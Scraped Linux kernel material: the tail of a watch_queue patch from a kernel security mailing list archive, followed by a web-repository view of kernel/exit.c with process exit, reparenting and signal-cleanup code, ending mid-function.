hlist_del_init_rcu(&watch->list_node); + rcu_assign_pointer(watch->watch_list, NULL); + spin_unlock(&wlist->lock); + + /* We now own the reference on watch that used to belong to wlist. */ + + n.watch.type = WATCH_TYPE_META; + n.watch.subtype = WATCH_META_REMOVAL_NOTIFICATION; + n.watch.info = watch->info_id | watch_sizeof(n.watch); + n.id = id; + if (id != 0) + n.watch.info = watch->info_id | watch_sizeof(n); + + wqueue = rcu_dereference(watch->queue); + + /* We don't need the watch list lock for the next bit as RCU is + * protecting *wqueue from deallocation. + */ + if (wqueue) { + post_one_notification(wqueue, &n.watch); + + spin_lock_bh(&wqueue->lock); + + if (!hlist_unhashed(&watch->queue_node)) { + hlist_del_init_rcu(&watch->queue_node); + put_watch(watch); + } + + spin_unlock_bh(&wqueue->lock); + } + + if (wlist->release_watch) { + void (*release_watch)(struct watch *); + + release_watch = wlist->release_watch; + rcu_read_unlock(); + (*release_watch)(watch); + rcu_read_lock(); + } + put_watch(watch); + + if (all && !hlist_empty(&wlist->watchers)) + goto again; +out: + rcu_read_unlock(); + return ret; +} +EXPORT_SYMBOL(remove_watch_from_object); + +/* + * Remove all the watches that are contributory to a queue. This has the + * potential to race with removal of the watches by the destruction of the + * objects being watched or with the distribution of notifications. + */ +void watch_queue_clear(struct watch_queue *wqueue) +{ + struct watch_list *wlist; + struct watch *watch; + bool release; + + rcu_read_lock(); + spin_lock_bh(&wqueue->lock); + + /* Prevent new additions and prevent notifications from happening */ + wqueue->defunct = true; + + while (!hlist_empty(&wqueue->watches)) { + watch = hlist_entry(wqueue->watches.first, struct watch, queue_node); + hlist_del_init_rcu(&watch->queue_node); + /* We now own a ref on the watch. */ + spin_unlock_bh(&wqueue->lock); + + /* We can't do the next bit under the queue lock as we need to + * get the list lock - which would cause a deadlock if someone + * was removing from the opposite direction at the same time or + * posting a notification. + */ + wlist = rcu_dereference(watch->watch_list); + if (wlist) { + void (*release_watch)(struct watch *); + + spin_lock(&wlist->lock); + + release = !hlist_unhashed(&watch->list_node); + if (release) { + hlist_del_init_rcu(&watch->list_node); + rcu_assign_pointer(watch->watch_list, NULL); + + /* We now own a second ref on the watch. */ + } + + release_watch = wlist->release_watch; + spin_unlock(&wlist->lock); + + if (release) { + if (release_watch) { + rcu_read_unlock(); + /* This might need to call dput(), so + * we have to drop all the locks. + */ + (*release_watch)(watch); + rcu_read_lock(); + } + put_watch(watch); + } + } + + put_watch(watch); + spin_lock_bh(&wqueue->lock); + } + + spin_unlock_bh(&wqueue->lock); + rcu_read_unlock(); +} + +/** + * get_watch_queue - Get a watch queue from its file descriptor. + * @fd: The fd to query. + */ +struct watch_queue *get_watch_queue(int fd) +{ + struct pipe_inode_info *pipe; + struct watch_queue *wqueue = ERR_PTR(-EINVAL); + struct fd f; + + f = fdget(fd); + if (f.file) { + pipe = get_pipe_info(f.file, false); + if (pipe && pipe->watch_queue) { + wqueue = pipe->watch_queue; + kref_get(&wqueue->usage); + } + fdput(f); + } + + return wqueue; +} +EXPORT_SYMBOL(get_watch_queue); + +/* + * Initialise a watch queue + */ +int watch_queue_init(struct pipe_inode_info *pipe) +{ + struct watch_queue *wqueue; + + wqueue = kzalloc(sizeof(*wqueue), GFP_KERNEL); + if (!wqueue) + return -ENOMEM; + + wqueue->pipe = pipe; + kref_init(&wqueue->usage); + spin_lock_init(&wqueue->lock); + INIT_HLIST_HEAD(&wqueue->watches); + + pipe->watch_queue = wqueue; + return 0; +} More information about the Linux-security-module-archive mailing list
__label__pos
0.797498
Take the 2-minute tour × MathOverflow is a question and answer site for professional mathematicians. It's 100% free, no registration required. Let $A=\mathbf{Q}[x_1,\ldots,x_n]$ be the polynomial ring in $n$ variables over the rational numbers. Let $B=\mathbf{Q}[f_1,\ldots,f_r]$ and $C=\mathbf{Q}[g_1,\ldots,g_s]$ be two finitely generated $\mathbf{Q}$-subalgebras of $A$ with explicit generators. Q1: Is there a finite time (efficient) algorithm that allows one to say when is $B\simeq C$ as $\mathbf{Q}$-algebra? Q2: Is there a finite time (efficient) algorithm that allows one to say when is $Frac(B)\simeq Frac(C)$? Here $Frac(B)$ denotes the fraction field. In both questions I really mean isomorphic and not equal. share|improve this question      I don't know much about algorithmic questions like this. But: it would probably help to specify whether you are given a set of generators for $B$ and $C$, or whether you merely have some implicit description of these subalgebras. –  MTS Jun 9 '12 at 0:06      Since $B$ and $C$ are both subalgebras of the same ring $A$, do you want to know whether they are isomorphic, or whether they are equal? –  David Speyer Jun 9 '12 at 0:52 1   @David, here I really mean isomorphic. Equal would be "easy" since one may compute the relation ideal for $B$ and $C$ and then test for equality. –  Hugo Chapdelaine Jun 9 '12 at 2:42      @MTS, yes in both cases I have explicit sets of generators. –  Hugo Chapdelaine Jun 9 '12 at 2:46 4   mathoverflow.net/questions/21883/… –  M P Jun 9 '12 at 3:18 add comment Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Browse other questions tagged or ask your own question.
__label__pos
0.754078
Question The profit (or loss) from an investment is normally distributed with a mean of $11,200 and a standard deviation of $8,250. a. What is the probability that there will be a loss rather than a profit? b. What is the probability that the profit will be between $10,000 and $20,000? c. Find x such that the probability that the profit will exceed x is 25%. d. If the loss exceeds $10,000 the company will have to borrow additional cash. What is the probability that the company will have to borrow additional cash? e. Calculate the value at risk. $1.99 Sales0 Views44 Comments0 • CreatedJune 03, 2015 • Files Included Post your question 5000 
__label__pos
0.705956
Home Home > GIT Browse summaryrefslogtreecommitdiff blob: 516acdb0e0ec9bd48e3006a8ede165437b3e121f (plain) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 1322 1323 1324 1325 1326 1327 1328 1329 1330 1331 1332 1333 1334 1335 1336 1337 1338 1339 1340 1341 1342 1343 1344 1345 1346 1347 1348 1349 1350 1351 1352 1353 1354 1355 1356 1357 1358 1359 1360 1361 1362 1363 1364 1365 1366 1367 1368 1369 1370 1371 1372 1373 1374 1375 1376 1377 1378 1379 1380 1381 1382 1383 1384 1385 1386 1387 1388 1389 1390 1391 1392 1393 1394 1395 1396 1397 1398 1399 1400 1401 1402 1403 1404 1405 1406 1407 1408 1409 1410 1411 1412 1413 1414 1415 1416 1417 1418 1419 1420 1421 1422 1423 1424 1425 1426 1427 1428 1429 1430 1431 1432 1433 1434 1435 1436 1437 1438 1439 1440 1441 1442 1443 1444 1445 1446 1447 1448 1449 1450 1451 1452 1453 1454 1455 1456 1457 1458 1459 1460 1461 1462 1463 1464 1465 1466 1467 1468 1469 1470 1471 1472 1473 1474 1475 1476 1477 1478 1479 1480 1481 1482 1483 1484 1485 1486 1487 1488 1489 1490 1491 1492 1493 1494 1495 1496 1497 1498 1499 1500 1501 1502 1503 1504 1505 1506 1507 1508 1509 1510 1511 1512 1513 1514 1515 1516 1517 1518 1519 1520 1521 1522 1523 1524 1525 1526 1527 1528 1529 1530 1531 1532 1533 1534 1535 1536 1537 1538 1539 1540 1541 1542 1543 1544 1545 1546 1547 1548 1549 1550 1551 1552 1553 1554 1555 1556 1557 1558 1559 1560 1561 1562 1563 1564 1565 1566 1567 1568 1569 1570 1571 1572 1573 1574 1575 1576 1577 1578 1579 1580 1581 1582 1583 1584 1585 1586 1587 1588 1589 1590 1591 1592 1593 1594 1595 1596 1597 1598 1599 1600 1601 1602 1603 1604 1605 1606 1607 1608 1609 1610 1611 1612 1613 1614 1615 1616 1617 1618 1619 1620 1621 1622 1623 1624 1625 1626 1627 1628 1629 1630 1631 1632 1633 1634 1635 1636 1637 1638 1639 1640 1641 1642 1643 1644 1645 1646 1647 1648 1649 1650 1651 1652 1653 1654 1655 1656 1657 1658 1659 1660 1661 1662 1663 1664 1665 1666 1667 1668 1669 1670 1671 1672 1673 1674 1675 1676 1677 1678 1679 1680 1681 1682 1683 1684 1685 1686 1687 1688 1689 1690 1691 1692 1693 1694 1695 1696 1697 1698 1699 1700 1701 1702 1703 1704 1705 1706 1707 1708 1709 1710 1711 1712 1713 1714 1715 1716 1717 1718 1719 1720 1721 1722 1723 1724 1725 1726 1727 1728 1729 1730 1731 1732 1733 1734 1735 1736 1737 /* * linux/kernel/exit.c * * Copyright (C) 1991, 1992 Linus Torvalds */ #include <linux/mm.h> #include <linux/slab.h> #include <linux/sched/autogroup.h> #include <linux/sched/mm.h> #include <linux/sched/stat.h> #include <linux/sched/task.h> #include <linux/sched/task_stack.h> #include <linux/sched/cputime.h> #include <linux/interrupt.h> #include <linux/module.h> #include <linux/capability.h> #include <linux/completion.h> #include <linux/personality.h> #include <linux/tty.h> #include <linux/iocontext.h> #include <linux/key.h> #include <linux/cpu.h> #include <linux/acct.h> #include <linux/tsacct_kern.h> #include <linux/file.h> #include <linux/fdtable.h> #include <linux/freezer.h> #include <linux/binfmts.h> #include <linux/nsproxy.h> #include <linux/pid_namespace.h> #include <linux/ptrace.h> #include <linux/profile.h> #include <linux/mount.h> #include <linux/proc_fs.h> #include <linux/kthread.h> #include <linux/mempolicy.h> #include <linux/taskstats_kern.h> #include <linux/delayacct.h> #include <linux/cgroup.h> #include <linux/syscalls.h> #include <linux/signal.h> #include <linux/posix-timers.h> #include <linux/cn_proc.h> #include <linux/mutex.h> #include <linux/futex.h> #include <linux/pipe_fs_i.h> #include <linux/audit.h> /* for audit_free() */ #include <linux/resource.h> #include <linux/blkdev.h> #include <linux/task_io_accounting_ops.h> #include <linux/tracehook.h> #include <linux/fs_struct.h> #include <linux/userfaultfd_k.h> #include <linux/init_task.h> #include <linux/perf_event.h> #include <trace/events/sched.h> #include <linux/hw_breakpoint.h> #include <linux/oom.h> #include <linux/writeback.h> #include <linux/shm.h> #include <linux/kcov.h> #include <linux/random.h> #include <linux/rcuwait.h> #include <linux/uaccess.h> #include <asm/unistd.h> #include <asm/pgtable.h> #include <asm/mmu_context.h> static void __unhash_process(struct task_struct *p, bool group_dead) { nr_threads--; detach_pid(p, PIDTYPE_PID); if (group_dead) { detach_pid(p, PIDTYPE_PGID); detach_pid(p, PIDTYPE_SID); list_del_rcu(&p->tasks); list_del_init(&p->sibling); __this_cpu_dec(process_counts); } list_del_rcu(&p->thread_group); list_del_rcu(&p->thread_node); } /* * This function expects the tasklist_lock write-locked. */ static void __exit_signal(struct task_struct *tsk) { struct signal_struct *sig = tsk->signal; bool group_dead = thread_group_leader(tsk); struct sighand_struct *sighand; struct tty_struct *uninitialized_var(tty); u64 utime, stime; sighand = rcu_dereference_check(tsk->sighand, lockdep_tasklist_lock_is_held()); spin_lock(&sighand->siglock); #ifdef CONFIG_POSIX_TIMERS posix_cpu_timers_exit(tsk); if (group_dead) { posix_cpu_timers_exit_group(tsk); } else { /* * This can only happen if the caller is de_thread(). * FIXME: this is the temporary hack, we should teach * posix-cpu-timers to handle this case correctly. */ if (unlikely(has_group_leader_pid(tsk))) posix_cpu_timers_exit_group(tsk); } #endif if (group_dead) { tty = sig->tty; sig->tty = NULL; } else { /* * If there is any task waiting for the group exit * then notify it: */ if (sig->notify_count > 0 && !--sig->notify_count) wake_up_process(sig->group_exit_task); if (tsk == sig->curr_target) sig->curr_target = next_thread(tsk); } add_device_randomness((const void*) &tsk->se.sum_exec_runtime, sizeof(unsigned long long)); /* * Accumulate here the counters for all threads as they die. We could * skip the group leader because it is the last user of signal_struct, * but we want to avoid the race with thread_group_cputime() which can * see the empty ->thread_head list. */ task_cputime(tsk, &utime, &stime); write_seqlock(&sig->stats_lock); sig->utime += utime; sig->stime += stime; sig->gtime += task_gtime(tsk); sig->min_flt += tsk->min_flt; sig->maj_flt += tsk->maj_flt; sig->nvcsw += tsk->nvcsw; sig->nivcsw += tsk->nivcsw; sig->inblock += task_io_get_inblock(tsk); sig->oublock += task_io_get_oublock(tsk); task_io_accounting_add(&sig->ioac, &tsk->ioac); sig->sum_sched_runtime += tsk->se.sum_exec_runtime; sig->nr_threads--; __unhash_process(tsk, group_dead); write_sequnlock(&sig->stats_lock); /* * Do this under ->siglock, we can race with another thread * doing sigqueue_free() if we have SIGQUEUE_PREALLOC signals. */ flush_sigqueue(&tsk->pending); tsk->sighand = NULL; spin_unlock(&sighand->siglock); __cleanup_sighand(sighand); clear_tsk_thread_flag(tsk, TIF_SIGPENDING); if (group_dead) { flush_sigqueue(&sig->shared_pending); tty_kref_put(tty); } } static void delayed_put_task_struct(struct rcu_head *rhp) { struct task_struct *tsk = container_of(rhp, struct task_struct, rcu); perf_event_delayed_put(tsk); trace_sched_process_free(tsk); put_task_struct(tsk); } void release_task(struct task_struct *p) { struct task_struct *leader; int zap_leader; repeat: /* don't need to get the RCU readlock here - the process is dead and * can't be modifying its own credentials. But shut RCU-lockdep up */ rcu_read_lock(); atomic_dec(&__task_cred(p)->user->processes); rcu_read_unlock(); proc_flush_task(p); write_lock_irq(&tasklist_lock); ptrace_release_task(p); __exit_signal(p); /* * If we are the last non-leader member of the thread * group, and the leader is zombie, then notify the * group leader's parent process. (if it wants notification.) */ zap_leader = 0; leader = p->group_leader; if (leader != p && thread_group_empty(leader) && leader->exit_state == EXIT_ZOMBIE) { /* * If we were the last child thread and the leader has * exited already, and the leader's parent ignores SIGCHLD, * then we are the one who should release the leader. */ zap_leader = do_notify_parent(leader, leader->exit_signal); if (zap_leader) leader->exit_state = EXIT_DEAD; } write_unlock_irq(&tasklist_lock); release_thread(p); call_rcu(&p->rcu, delayed_put_task_struct); p = leader; if (unlikely(zap_leader)) goto repeat; } /* * Note that if this function returns a valid task_struct pointer (!NULL) * task->usage must remain >0 for the duration of the RCU critical section. */ struct task_struct *task_rcu_dereference(struct task_struct **ptask) { struct sighand_struct *sighand; struct task_struct *task; /* * We need to verify that release_task() was not called and thus * delayed_put_task_struct() can't run and drop the last reference * before rcu_read_unlock(). We check task->sighand != NULL, * but we can read the already freed and reused memory. */ retry: task = rcu_dereference(*ptask); if (!task) return NULL; probe_kernel_address(&task->sighand, sighand); /* * Pairs with atomic_dec_and_test() in put_task_struct(). If this task * was already freed we can not miss the preceding update of this * pointer. */ smp_rmb(); if (unlikely(task != READ_ONCE(*ptask))) goto retry; /* * We've re-checked that "task == *ptask", now we have two different * cases: * * 1. This is actually the same task/task_struct. In this case * sighand != NULL tells us it is still alive. * * 2. This is another task which got the same memory for task_struct. * We can't know this of course, and we can not trust * sighand != NULL. * * In this case we actually return a random value, but this is * correct. * * If we return NULL - we can pretend that we actually noticed that * *ptask was updated when the previous task has exited. Or pretend * that probe_slab_address(&sighand) reads NULL. * * If we return the new task (because sighand is not NULL for any * reason) - this is fine too. This (new) task can't go away before * another gp pass. * * And note: We could even eliminate the false positive if re-read * task->sighand once again to avoid the falsely NULL. But this case * is very unlikely so we don't care. */ if (!sighand) return NULL; return task; } void rcuwait_wake_up(struct rcuwait *w) { struct task_struct *task; rcu_read_lock(); /* * Order condition vs @task, such that everything prior to the load * of @task is visible. This is the condition as to why the user called * rcuwait_trywake() in the first place. Pairs with set_current_state() * barrier (A) in rcuwait_wait_event(). * * WAIT WAKE * [S] tsk = current [S] cond = true * MB (A) MB (B) * [L] cond [L] tsk */ smp_rmb(); /* (B) */ /* * Avoid using task_rcu_dereference() magic as long as we are careful, * see comment in rcuwait_wait_event() regarding ->exit_state. */ task = rcu_dereference(w->task); if (task) wake_up_process(task); rcu_read_unlock(); } struct task_struct *try_get_task_struct(struct task_struct **ptask) { struct task_struct *task; rcu_read_lock(); task = task_rcu_dereference(ptask); if (task) get_task_struct(task); rcu_read_unlock(); return task; } /* * Determine if a process group is "orphaned", according to the POSIX * definition in 2.2.2.52. Orphaned process groups are not to be affected * by terminal-generated stop signals. Newly orphaned process groups are * to receive a SIGHUP and a SIGCONT. * * "I ask you, have you ever known what it is to be an orphan?" */ static int will_become_orphaned_pgrp(struct pid *pgrp, struct task_struct *ignored_task) { struct task_struct *p; do_each_pid_task(pgrp, PIDTYPE_PGID, p) { if ((p == ignored_task) || (p->exit_state && thread_group_empty(p)) || is_global_init(p->real_parent)) continue; if (task_pgrp(p->real_parent) != pgrp && task_session(p->real_parent) == task_session(p)) return 0; } while_each_pid_task(pgrp, PIDTYPE_PGID, p); return 1; } int is_current_pgrp_orphaned(void) { int retval; read_lock(&tasklist_lock); retval = will_become_orphaned_pgrp(task_pgrp(current), NULL); read_unlock(&tasklist_lock); return retval; } static bool has_stopped_jobs(struct pid *pgrp) { struct task_struct *p; do_each_pid_task(pgrp, PIDTYPE_PGID, p) { if (p->signal->flags & SIGNAL_STOP_STOPPED) return true; } while_each_pid_task(pgrp, PIDTYPE_PGID, p); return false; } /* * Check to see if any process groups have become orphaned as * a result of our exiting, and if they have any stopped jobs, * send them a SIGHUP and then a SIGCONT. (POSIX 3.2.2.2) */ static void kill_orphaned_pgrp(struct task_struct *tsk, struct task_struct *parent) { struct pid *pgrp = task_pgrp(tsk); struct task_struct *ignored_task = tsk; if (!parent) /* exit: our father is in a different pgrp than * we are and we were the only connection outside. */ parent = tsk->real_parent; else /* reparent: our child is in a different pgrp than * we are, and it was the only connection outside. */ ignored_task = NULL; if (task_pgrp(parent) != pgrp && task_session(parent) == task_session(tsk) && will_become_orphaned_pgrp(pgrp, ignored_task) && has_stopped_jobs(pgrp)) { __kill_pgrp_info(SIGHUP, SEND_SIG_PRIV, pgrp); __kill_pgrp_info(SIGCONT, SEND_SIG_PRIV, pgrp); } } #ifdef CONFIG_MEMCG /* * A task is exiting. If it owned this mm, find a new owner for the mm. */ void mm_update_next_owner(struct mm_struct *mm) { struct task_struct *c, *g, *p = current; retry: /* * If the exiting or execing task is not the owner, it's * someone else's problem. */ if (mm->owner != p) return; /* * The current owner is exiting/execing and there are no other * candidates. Do not leave the mm pointing to a possibly * freed task structure. */ if (atomic_read(&mm->mm_users) <= 1) { mm->owner = NULL; return; } read_lock(&tasklist_lock); /* * Search in the children */ list_for_each_entry(c, &p->children, sibling) { if (c->mm == mm) goto assign_new_owner; } /* * Search in the siblings */ list_for_each_entry(c, &p->real_parent->children, sibling) { if (c->mm == mm) goto assign_new_owner; } /* * Search through everything else, we should not get here often. */ for_each_process(g) { if (g->flags & PF_KTHREAD) continue; for_each_thread(g, c) { if (c->mm == mm) goto assign_new_owner; if (c->mm) break; } } read_unlock(&tasklist_lock); /* * We found no owner yet mm_users > 1: this implies that we are * most likely racing with swapoff (try_to_unuse()) or /proc or * ptrace or page migration (get_task_mm()). Mark owner as NULL. */ mm->owner = NULL; return; assign_new_owner: BUG_ON(c == p); get_task_struct(c); /* * The task_lock protects c->mm from changing. * We always want mm->owner->mm == mm */ task_lock(c); /* * Delay read_unlock() till we have the task_lock() * to ensure that c does not slip away underneath us */ read_unlock(&tasklist_lock); if (c->mm != mm) { task_unlock(c); put_task_struct(c); goto retry; } mm->owner = c; task_unlock(c); put_task_struct(c); } #endif /* CONFIG_MEMCG */ /* * Turn us into a lazy TLB process if we * aren't already.. */ static void exit_mm(void) { struct mm_struct *mm = current->mm; struct core_state *core_state; mm_release(current, mm); if (!mm) return; sync_mm_rss(mm); /* * Serialize with any possible pending coredump. * We must hold mmap_sem around checking core_state * and clearing tsk->mm. The core-inducing thread * will increment ->nr_threads for each thread in the * group with ->mm != NULL. */ down_read(&mm->mmap_sem); core_state = mm->core_state; if (core_state) { struct core_thread self; up_read(&mm->mmap_sem); self.task = current; self.next = xchg(&core_state->dumper.next, &self); /* * Implies mb(), the result of xchg() must be visible * to core_state->dumper. */ if (atomic_dec_and_test(&core_state->nr_threads)) complete(&core_state->startup); for (;;) { set_current_state(TASK_UNINTERRUPTIBLE); if (!self.task) /* see coredump_finish() */ break; freezable_schedule(); } __set_current_state(TASK_RUNNING); down_read(&mm->mmap_sem); } mmgrab(mm); BUG_ON(mm != current->active_mm); /* more a memory barrier than a real lock */ task_lock(current); current->mm = NULL; up_read(&mm->mmap_sem); enter_lazy_tlb(mm, current); task_unlock(current); mm_update_next_owner(mm); mmput(mm); if (test_thread_flag(TIF_MEMDIE)) exit_oom_victim(); } static struct task_struct *find_alive_thread(struct task_struct *p) { struct task_struct *t; for_each_thread(p, t) { if (!(t->flags & PF_EXITING)) return t; } return NULL; } static struct task_struct *find_child_reaper(struct task_struct *father) __releases(&tasklist_lock) __acquires(&tasklist_lock) { struct pid_namespace *pid_ns = task_active_pid_ns(father); struct task_struct *reaper = pid_ns->child_reaper; if (likely(reaper != father)) return reaper; reaper = find_alive_thread(father); if (reaper) { pid_ns->child_reaper = reaper; return reaper; } write_unlock_irq(&tasklist_lock); if (unlikely(pid_ns == &init_pid_ns)) { panic("Attempted to kill init! exitcode=0x%08x\n", father->signal->group_exit_code ?: father->exit_code); } zap_pid_ns_processes(pid_ns); write_lock_irq(&tasklist_lock); return father; } /* * When we die, we re-parent all our children, and try to: * 1. give them to another thread in our thread group, if such a member exists * 2. give it to the first ancestor process which prctl'd itself as a * child_subreaper for its children (like a service manager) * 3. give it to the init process (PID 1) in our pid namespace */ static struct task_struct *find_new_reaper(struct task_struct *father, struct task_struct *child_reaper) { struct task_struct *thread, *reaper; thread = find_alive_thread(father); if (thread) return thread; if (father->signal->has_child_subreaper) { unsigned int ns_level = task_pid(father)->level; /* * Find the first ->is_child_subreaper ancestor in our pid_ns. * We can't check reaper != child_reaper to ensure we do not * cross the namespaces, the exiting parent could be injected * by setns() + fork(). * We check pid->level, this is slightly more efficient than * task_active_pid_ns(reaper) != task_active_pid_ns(father). */ for (reaper = father->real_parent; task_pid(reaper)->level == ns_level; reaper = reaper->real_parent) { if (reaper == &init_task) break; if (!reaper->signal->is_child_subreaper) continue; thread = find_alive_thread(reaper); if (thread) return thread; } } return child_reaper; } /* * Any that need to be release_task'd are put on the @dead list. */ static void reparent_leader(struct task_struct *father, struct task_struct *p, struct list_head *dead) { if (unlikely(p->exit_state == EXIT_DEAD)) return; /* We don't want people slaying init. */ p->exit_signal = SIGCHLD; /* If it has exited notify the new parent about this child's death. */ if (!p->ptrace && p->exit_state == EXIT_ZOMBIE && thread_group_empty(p)) { if (do_notify_parent(p, p->exit_signal)) { p->exit_state = EXIT_DEAD; list_add(&p->ptrace_entry, dead); } } kill_orphaned_pgrp(p, father); } /* * This does two things: * * A. Make init inherit all the child processes * B. Check to see if any process groups have become orphaned * as a result of our exiting, and if they have any stopped * jobs, send them a SIGHUP and then a SIGCONT. (POSIX 3.2.2.2) */ static void forget_original_parent(struct task_struct *father, struct list_head *dead) { struct task_struct *p, *t, *reaper; if (unlikely(!list_empty(&father->ptraced))) exit_ptrace(father, dead); /* Can drop and reacquire tasklist_lock */ reaper = find_child_reaper(father); if (list_empty(&father->children)) return; reaper = find_new_reaper(father, reaper); list_for_each_entry(p, &father->children, sibling) { for_each_thread(p, t) { t->real_parent = reaper; BUG_ON((!t->ptrace) != (t->parent == father)); if (likely(!t->ptrace)) t->parent = t->real_parent; if (t->pdeath_signal) group_send_sig_info(t->pdeath_signal, SEND_SIG_NOINFO, t); } /* * If this is a threaded reparent there is no need to * notify anyone anything has happened. */ if (!same_thread_group(reaper, father)) reparent_leader(father, p, dead); } list_splice_tail_init(&father->children, &reaper->children); } /* * Send signals to all our closest relatives so that they know * to properly mourn us.. */ static void exit_notify(struct task_struct *tsk, int group_dead) { bool autoreap; struct task_struct *p, *n; LIST_HEAD(dead); write_lock_irq(&tasklist_lock); forget_original_parent(tsk, &dead); if (group_dead) kill_orphaned_pgrp(tsk->group_leader, NULL); if (unlikely(tsk->ptrace)) { int sig = thread_group_leader(tsk) && thread_group_empty(tsk) && !ptrace_reparented(tsk) ? tsk->exit_signal : SIGCHLD; autoreap = do_notify_parent(tsk, sig); } else if (thread_group_leader(tsk)) { autoreap = thread_group_empty(tsk) && do_notify_parent(tsk, tsk->exit_signal); } else { autoreap = true; } tsk->exit_state = autoreap ? EXIT_DEAD : EXIT_ZOMBIE; if (tsk->exit_state == EXIT_DEAD) list_add(&tsk->ptrace_entry, &dead); /* mt-exec, de_thread() is waiting for group leader */ if (unlikely(tsk->signal->notify_count < 0)) wake_up_process(tsk->signal->group_exit_task); write_unlock_irq(&tasklist_lock); 